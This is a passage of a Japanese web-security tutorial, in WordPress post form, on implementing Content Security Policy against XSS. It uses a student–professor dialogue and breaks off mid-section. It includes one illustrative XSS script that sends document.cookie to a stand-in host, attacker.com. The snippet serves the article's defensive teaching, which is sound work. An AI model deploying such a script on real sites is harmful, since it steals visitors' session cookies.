{"id":12348,"date":"2026-02-02T17:24:47","date_gmt":"2026-02-02T17:24:47","guid":{"rendered":"https:\/\/withcode.tech\/media\/?p=12348"},"modified":"2026-04-02T05:09:48","modified_gmt":"2026-04-02T05:09:48","slug":"content_security_policy","status":"publish","type":"post","link":"https:\/\/withcode.tech\/media\/content_security_policy\/","title":{"rendered":"Content Security Policy (CSP)\u306e\u5b9f\u88c5\u30ac\u30a4\u30c9\uff5c\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u304b\u3089\u6bb5\u968e\u7684\u5c0e\u5165\u307e\u3067\u5fb9\u5e95\u89e3\u8aac"},"content":{"rendered":"<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-14.40.37.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u6700\u8fd1\u3001XSS\u653b\u6483\u304b\u3089Web\u30b5\u30a4\u30c8\u3092\u5b88\u308b\u65b9\u6cd5\u3092\u8abf\u3079\u3066\u3044\u305f\u3089\u300cCSP\u300d\u3068\u3044\u3046\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u6a5f\u80fd\u3092\u898b\u3064\u3051\u305f\u3093\u3067\u3059\u3051\u3069\u3001\u3069\u3046\u3084\u3063\u3066\u5b9f\u88c5\u3059\u308c\u3070\u826f\u3044\u3093\u3067\u3059\u304b\uff1f<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.11.23.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u3088\u30fc\u304f\u805e\u304f\u3093\u3060\u305e\uff01CSP\uff08Content Security Policy\uff09\u306f\u3001XSS\u653b\u6483\u3092\u9632\u3050\u975e\u5e38\u306b\u5f37\u529b\u306a\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u6a5f\u80fd\u3058\u3083\u3002\u4eca\u65e5\u306f\u57fa\u672c\u7684\u306a\u4ed5\u7d44\u307f\u304b\u3089\u5b9f\u8df5\u7684\u306a\u5b9f\u88c5\u65b9\u6cd5\u307e\u3067\u3001\u8a73\u3057\u304f\u89e3\u8aac\u3059\u308b\u305e\u3044\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-14.48.08.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u3042\u308a\u304c\u3068\u3046\u3054\u3056\u3044\u307e\u3059\uff01\u3088\u308d\u3057\u304f\u304a\u9858\u3044\u3044\u305f\u3057\u307e\u3059\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<p class=\"wp-block-paragraph\">Web\u30b5\u30a4\u30c8\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306f\u3001\u958b\u767a\u8005\u306b\u3068\u3063\u3066\u6700\u3082\u91cd\u8981\u306a\u8ab2\u984c\u306e\u4e00\u3064\u3067\u3059\u3002\u7279\u306bXSS\uff08Cross-Site Scripting\uff09\u653b\u6483\u306f\u3001\u500b\u4eba\u60c5\u5831\u306e\u6f0f\u6d29\u3084\u30a2\u30ab\u30a6\u30f3\u30c8\u4e57\u3063\u53d6\u308a\u306a\u3069\u3001\u6df1\u523b\u306a\u88ab\u5bb3\u3092\u3082\u305f\u3089\u3059\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u672c\u8a18\u4e8b\u3067\u306f\u3001<strong><span class=\"swl-marker mark_yellow\">Content Security Policy (CSP)\u306e\u5b9f\u88c5\u65b9\u6cd5<\/span><\/strong>\u306b\u3064\u3044\u3066\u3001\u57fa\u672c\u7684\u306a\u4ed5\u7d44\u307f\u304b\u3089\u5404\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306e\u8a73\u7d30\u3001\u5b9f\u8df5\u7684\u306a\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u96c6\u3001\u6bb5\u968e\u7684\u306a\u5c0e\u5165\u65b9\u6cd5\u3001\u3088\u304f\u3042\u308b\u554f\u984c\u306e\u89e3\u6c7a\u65b9\u6cd5\u307e\u3067\u3001\u5b9f\u88c5\u4f8b\u3092\u4ea4\u3048\u306a\u304c\u3089\u8a73\u3057\u304f\u89e3\u8aac\u3057\u307e\u3059\u3002<\/p>\n\n\n\n<p class=\"is-style-icon_announce wp-block-paragraph\">\u300c\u5b66\u7fd2\u2192\u6848\u4ef6\u7372\u5f97\u300d\u306b\u3064\u306a\u3052\u305f\u53d7\u8b1b\u751f\u306e\u30ea\u30a2\u30eb\u306a\u4f53\u9a13\u8ac7\u3082\u516c\u958b\u4e2d\uff01<br>\u50cd\u304d\u65b9\u3092\u5909\u3048\u305f\u3044\u65b9\u306b\u3082\u97ff\u304f\u30b9\u30c8\u30fc\u30ea\u30fc\u3067\u3059\u3002<\/p>\n\n\n\n<p class=\"is-style-icon_info wp-block-paragraph\"><strong><strong>\u83c5\u4e95<\/strong>\u3055\u3093<\/strong><br>\u5c06\u6765\u7684\u3078\u306e\u4e0d\u5b89\u3068\u5b50\u80b2\u3066\u3068\u3044\u3046\u80cc\u666f\u304b\u3089\u300c\u526f\u696d\u300d\u306b\u6311\u6226\u3057\u3088\u3046\u3068\u6c7a\u610f\u3002\u72ec\u5b66\u304b\u3089\u30d7\u30ed\u30b0\u30e9\u30df\u30f3\u30b0\u306e\u5b66\u7fd2\u3092\u958b\u59cb\u3057\u3066\u3044\u305f\u304c\u3001WithCode\u306b\u51fa\u4f1a\u3044\u4f53\u9a13\u30b3\u30fc\u30b9\u3092\u53d7\u8b1b\u3002\u7d044\u30f6\u6708\u306e\u5b66\u7fd2\u306b\u53d6\u308a\u7d44\u307f\u3001\u5f53\u521d\u306e\u76ee\u6a19\u3067\u3042\u3063\u305f\u5352\u696d\u30c6\u30b9\u30c8\u5408\u683c\u3092\u5b9f\u73fe\u3057\u305f\u3002WithCode Platinum\u306b\u30663\u4ef6\u306e\u6848\u4ef6\u3092\u62c5\u5f53\u3057\u3001\u73fe\u5728\u306f\u526f\u696d\u3060\u3051\u3067\u306a\u304f\u672c\u683c\u7684\u306b\u300c\u30d5\u30ea\u30fc\u30e9\u30f3\u30b9\u300d\u3068\u3057\u3066\u5728\u5b85\u3067\u6d3b\u8e8d\u3057\u3066\u3044\u304d\u305f\u3044\u3068\u8003\u3048\u308b\u3088\u3046\u306b\u306a\u308b\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8a73\u3057\u304f\u306f<a href=\"https:\/\/withcode.tech\/media\/interview_5\/\" title=\"\">\u3053\u3061\u3089\u306e\u8a18\u4e8b<\/a>\u3092\u3054\u89a7\u304f\u3060\u3055\u3044\u3002<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-wp-embed is-provider-withcode-media wp-block-embed-withcode-media\"><div class=\"wp-block-embed__wrapper\">\nhttps:\/\/withcode.tech\/media\/interview_5\/\n<\/div><\/figure>\n\n\n\n<p class=\"is-style-balloon_box2 wp-block-paragraph\"><strong><strong><strong>\u83c5\u4e95<\/strong><\/strong>\u3055\u3093\u306e\u4e3b\u306a\u5236\u4f5c\u5b9f\u7e3e\u306f\u3053\u3061\u3089<\/strong><\/p>\n\n\n<div class=\"swell-block-postLink\">\t\t\t<div class=\"p-blogCard -external\" data-type=\"type3\" data-onclick=\"clickLink\">\n\t\t\t\t<div class=\"p-blogCard__inner\">\n\t\t\t\t\t<span class=\"p-blogCard__caption\">\u5e83\u544a\u7528\u9014\u3067\u306e\u65b0\u898fLP\u5236\u4f5c<\/span>\n\t\t\t\t\t<div class=\"p-blogCard__thumb c-postThumb\"><figure class=\"c-postThumb__figure\"><img decoding=\"async\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/08\/study-office.net_lp-2.webp\" alt=\"\" class=\"c-postThumb__img u-obf-cover\" width=\"320\" height=\"180\"><\/figure><\/div>\t\t\t\t\t<div class=\"p-blogCard__body\">\n\t\t\t\t\t\t<a class=\"p-blogCard__title\" href=\"https:\/\/withcode.tech\/works\/yourdelt\/\" target=\"_blank\" rel=\"noopener noreferrer\">\u682a\u5f0f\u4f1a\u793eYOURDELT \u69d8<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t<\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Content Security Policy (CSP)\u3068\u306f\uff1f<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006663.jpg\" alt=\"\" class=\"wp-image-13253\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006663.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006663-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n\n<p class=\"wp-block-paragraph\">Content Security Policy (CSP)\u306f\u3001Web\u30b5\u30a4\u30c8\u3067\u8aad\u307f\u8fbc\u3080\u30ea\u30bd\u30fc\u30b9\uff08JavaScript\u3001CSS\u3001\u753b\u50cf\u306a\u3069\uff09\u306e\u53d6\u5f97\u5143\u3092\u5236\u9650\u3059\u308b\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u6a5f\u80fd\u3067\u3059\u3002HTTP\u30d8\u30c3\u30c0\u30fc\u307e\u305f\u306fHTML\u306e<code>&lt;meta&gt;<\/code>\u30bf\u30b0\u3067\u8a2d\u5b9a\u3057\u307e\u3059\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">CSP\u304c\u9632\u3050\u653b\u6483<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">CSP\u306f\u4e3b\u306b\u4ee5\u4e0b\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u8105\u5a01\u304b\u3089\u4fdd\u8b77\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>XSS\uff08Cross-Site Scripting\uff09\u653b\u6483<\/strong>\uff1a\u60aa\u610f\u306e\u3042\u308b\u30b9\u30af\u30ea\u30d7\u30c8\u306e\u5b9f\u884c\u3092\u9632\u6b62<\/li>\n\n\n\n<li><strong>\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u653b\u6483<\/strong>\uff1a\u4e0d\u6b63\u306a\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u57cb\u3081\u8fbc\u307f\u3092\u30d6\u30ed\u30c3\u30af<\/li>\n\n\n\n<li><strong>\u30d1\u30b1\u30c3\u30c8\u76d7\u8074<\/strong>\uff1aHTTPS\u3078\u306e\u30a2\u30c3\u30d7\u30b0\u30ec\u30fc\u30c9\u3092\u5f37\u5236<\/li>\n\n\n\n<li><strong>\u30af\u30ea\u30c3\u30af\u30b8\u30e3\u30c3\u30ad\u30f3\u30b0<\/strong>\uff1a\u30d5\u30ec\u30fc\u30e0\u57cb\u3081\u8fbc\u307f\u3092\u5236\u9650<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">CSP\u306e\u4ed5\u7d44\u307f<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">CSP\u306f\u3001<strong><span class=\"swl-marker mark_yellow\">\u30db\u30ef\u30a4\u30c8\u30ea\u30b9\u30c8\u65b9\u5f0f<\/span><\/strong>\u3067\u30ea\u30bd\u30fc\u30b9\u306e\u8aad\u307f\u8fbc\u307f\u3092\u5236\u5fa1\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u958b\u767a\u8005\u304c\u300c\u8a31\u53ef\u3059\u308b\u30ea\u30bd\u30fc\u30b9\u306e\u53d6\u5f97\u5143\u300d\u3092\u6307\u5b9a<\/li>\n\n\n\n<li>\u30d6\u30e9\u30a6\u30b6\u304c\u30dd\u30ea\u30b7\u30fc\u306b\u9055\u53cd\u3059\u308b\u30ea\u30bd\u30fc\u30b9\u3092\u30d6\u30ed\u30c3\u30af<\/li>\n\n\n\n<li>\u9055\u53cd\u3092\u691c\u51fa\u3057\u305f\u5834\u5408\u3001\u30aa\u30d7\u30b7\u30e7\u30f3\u3067\u30ec\u30dd\u30fc\u30c8\u3092\u9001\u4fe1<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u3048\u3070\u3001\u300c\u81ea\u30b5\u30a4\u30c8\u3068CDN\u306eJavaScript\u306e\u307f\u8a31\u53ef\u300d\u3068\u8a2d\u5b9a\u3059\u308b\u3068\u3001\u653b\u6483\u8005\u304c\u57cb\u3081\u8fbc\u3093\u3060\u5916\u90e8\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u5b9f\u884c\u3055\u308c\u307e\u305b\u3093\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">CSP\u306e\u5b9f\u88c5\u65b9\u6cd5<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">CSP\u306f2\u3064\u306e\u65b9\u6cd5\u3067\u8a2d\u5b9a\u3067\u304d\u307e\u3059\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u65b9\u6cd51: HTTP\u30d8\u30c3\u30c0\u30fc\uff08\u63a8\u5968\uff09<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39; https:\/\/cdn.example.com<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u65b9\u6cd52: HTML\u306emeta\u30bf\u30b0<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-html\" data-lang=\"HTML\"><code>&lt;meta http-equiv=&quot;Content-Security-Policy&quot; content=&quot;default-src &#39;self&#39;; script-src &#39;self&#39; https:\/\/cdn.example.com&quot;&gt;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>HTTP\u30d8\u30c3\u30c0\u30fc\u304c\u63a8\u5968\u3055\u308c\u308b\u7406\u7531\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u3059\u3079\u3066\u306e\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u304c\u4f7f\u7528\u53ef\u80fd\uff08meta\u30bf\u30b0\u3067\u306f\u4e00\u90e8\u5236\u9650\u3042\u308a\uff09<\/li>\n\n\n\n<li>HTML\u304c\u89e3\u6790\u3055\u308c\u308b\u524d\u306b\u9069\u7528\u3055\u308c\u308b<\/li>\n\n\n\n<li>\u30b5\u30fc\u30d0\u30fc\u5074\u3067\u4e00\u5143\u7ba1\u7406\u3067\u304d\u308b<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u306a\u305cCSP\u304c\u5fc5\u8981\u306a\u306e\u304b\uff1fXSS\u653b\u6483\u306e\u8105\u5a01<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006664-1.jpg\" alt=\"\" class=\"wp-image-13256\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006664-1.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006664-1-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.13.05.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>CSP\u306e\u91cd\u8981\u6027\u3092\u7406\u89e3\u3059\u308b\u305f\u3081\u306b\u3001\u307e\u305a\u306fXSS\u653b\u6483\u306e\u5371\u967a\u6027\u3092\u898b\u3066\u3044\u3053\u3046\uff01\u3053\u3053\u3092\u77e5\u3063\u3066\u304a\u304b\u306a\u3044\u3068\u5927\u5909\u306a\u76ee\u306b\u906d\u3044\u3084\u3059\u304f\u306a\u308b\u304b\u3089\u306e\u3046\u3002<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.00.55.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u305d\u3046\u306a\u3093\u3067\u3059\u306d\uff01\u3088\u308d\u3057\u304f\u304a\u9858\u3044\u3057\u307e\u3059\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h3 class=\"wp-block-heading\">XSS\u653b\u6483\u306e\u5b9f\u4f8b<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u653b\u6483\u8005\u304c\u63b2\u793a\u677f\u306b\u3053\u306e\u3088\u3046\u306a\u30b3\u30e1\u30f3\u30c8\u3092\u6295\u7a3f\u3057\u305f\u3068\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-html\" data-lang=\"HTML\"><code>&lt;script&gt;\n  \/\/ \u30e6\u30fc\u30b6\u30fc\u306eCookie\u3092\u653b\u6483\u8005\u306e\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\n  fetch(&#39;https:\/\/attacker.com\/steal?data=&#39; + document.cookie);\n&lt;\/script&gt;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u30b5\u30cb\u30bf\u30a4\u30ba\uff08\u7121\u5bb3\u5316\u51e6\u7406\uff09\u304c\u4e0d\u5341\u5206\u306a\u5834\u5408\u3001\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u305d\u306e\u307e\u307e\u5b9f\u884c\u3055\u308c\u3001\u8a2a\u554f\u8005\u306eCookie\u304c\u76d7\u307e\u308c\u307e\u3059\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>XSS\u653b\u6483\u3067\u53ef\u80fd\u306a\u3053\u3068\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u30bb\u30c3\u30b7\u30e7\u30f3\u30cf\u30a4\u30b8\u30e3\u30c3\u30af<\/strong>\uff1a\u30ed\u30b0\u30a4\u30f3\u60c5\u5831\u3092\u76d7\u3093\u3067\u30a2\u30ab\u30a6\u30f3\u30c8\u4e57\u3063\u53d6\u308a<\/li>\n\n\n\n<li><strong>\u500b\u4eba\u60c5\u5831\u306e\u7a83\u53d6<\/strong>\uff1a\u30d5\u30a9\u30fc\u30e0\u5165\u529b\u5185\u5bb9\u3084\u8868\u793a\u30c7\u30fc\u30bf\u306e\u53d6\u5f97<\/li>\n\n\n\n<li><strong>\u30de\u30eb\u30a6\u30a7\u30a2\u914d\u5e03<\/strong>\uff1a\u507d\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u30ea\u30f3\u30af\u306e\u8868\u793a<\/li>\n\n\n\n<li><strong>\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0<\/strong>\uff1a\u507d\u306e\u30ed\u30b0\u30a4\u30f3\u30d5\u30a9\u30fc\u30e0\u3092\u8868\u793a<\/li>\n\n\n\n<li><strong>DDoS\u653b\u6483<\/strong>\uff1a\u8a2a\u554f\u8005\u306e\u30d6\u30e9\u30a6\u30b6\u3092\u8e0f\u307f\u53f0\u306b<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">CSP\u304cXSS\u653b\u6483\u3092\u9632\u3050\u4ed5\u7d44\u307f<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">CSP\u3092\u9069\u5207\u306b\u8a2d\u5b9a\u3059\u308b\u3068\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u9632\u5fa1\u3067\u304d\u307e\u3059\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u3053\u306e\u30dd\u30ea\u30b7\u30fc\u306e\u52b9\u679c\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u30d6\u30ed\u30c3\u30af<\/strong>\uff1a<code>&lt;script&gt;<\/code>\u30bf\u30b0\u5185\u306e\u30b3\u30fc\u30c9\u306f\u5b9f\u884c\u3055\u308c\u306a\u3044<\/li>\n\n\n\n<li><strong>\u5916\u90e8\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u30d6\u30ed\u30c3\u30af<\/strong>\uff1a<code>https:\/\/attacker.com<\/code>\u304b\u3089\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u8aad\u307f\u8fbc\u307e\u308c\u306a\u3044<\/li>\n\n\n\n<li><strong>eval()\u3092\u30d6\u30ed\u30c3\u30af<\/strong>\uff1a\u6587\u5b57\u5217\u304b\u3089\u306e\u30b3\u30fc\u30c9\u5b9f\u884c\u3092\u9632\u6b62<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u653b\u6483\u8005\u304c\u60aa\u610f\u306e\u3042\u308b\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u57cb\u3081\u8fbc\u3093\u3067\u3082\u3001\u30d6\u30e9\u30a6\u30b6\u304c\u5b9f\u884c\u3092\u62d2\u5426\u3059\u308b\u305f\u3081\u3001\u88ab\u5bb3\u3092\u9632\u3052\u307e\u3059\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5f93\u6765\u306e\u9632\u5fa1\u7b56\u3068\u306e\u9055\u3044<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30b5\u30cb\u30bf\u30a4\u30ba\uff08\u30a8\u30b9\u30b1\u30fc\u30d7\u51e6\u7406\uff09\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u958b\u767a\u8005\u304c\u5b8c\u74a7\u306b\u5b9f\u88c5\u3059\u308b\u5fc5\u8981\u304c\u3042\u308b<\/li>\n\n\n\n<li>1\u7b87\u6240\u3067\u3082\u6f0f\u308c\u304c\u3042\u308c\u3070\u8106\u5f31\u6027\u304c\u6b8b\u308b<\/li>\n\n\n\n<li>\u65b0\u3057\u3044\u653b\u6483\u624b\u6cd5\u3078\u306e\u5bfe\u5fdc\u304c\u9045\u308c\u308b\u53ef\u80fd\u6027<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>CSP\uff08\u591a\u5c64\u9632\u5fa1\uff09\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u30b5\u30cb\u30bf\u30a4\u30ba\u6f0f\u308c\u304c\u3042\u3063\u3066\u3082\u653b\u6483\u3092\u9632\u3052\u308b<\/li>\n\n\n\n<li>\u30d6\u30e9\u30a6\u30b6\u30ec\u30d9\u30eb\u3067\u5f37\u5236\u3055\u308c\u308b<\/li>\n\n\n\n<li>\u65e2\u77e5\u30fb\u672a\u77e5\u306e\u653b\u6483\u624b\u6cd5\u306e\u4e21\u65b9\u306b\u52b9\u679c<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><span class=\"swl-marker mark_yellow\">CSP\u306f\u30b5\u30cb\u30bf\u30a4\u30ba\u306e\u4ee3\u66ff\u3067\u306f\u306a\u304f\u3001\u8ffd\u52a0\u306e\u9632\u5fa1\u5c64<\/span><\/strong>\u3068\u3057\u3066\u6a5f\u80fd\u3057\u307e\u3059\u3002\u4e21\u65b9\u3092\u5b9f\u88c5\u3059\u308b\u3053\u3068\u3067\u3001\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3092\u5927\u5e45\u306b\u5f37\u5316\u3067\u304d\u307e\u3059\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">CSP\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306e\u8a73\u7d30\u89e3\u8aac<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006665.jpg\" alt=\"\" class=\"wp-image-13257\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006665.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006665-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.12.07.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>CSP\u306f\u3001\u8907\u6570\u306e\u300c\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u300d\u3092\u7d44\u307f\u5408\u308f\u305b\u3066\u8a2d\u5b9a\u3059\u308b\u3002\u5404\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306f\u7279\u5b9a\u306e\u7a2e\u985e\u306e\u30ea\u30bd\u30fc\u30b9\u3092\u5236\u5fa1\u3059\u308b\u305e\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-14.48.08.jpg\" alt=\"\" class=\"c-balloon__iconImg\" 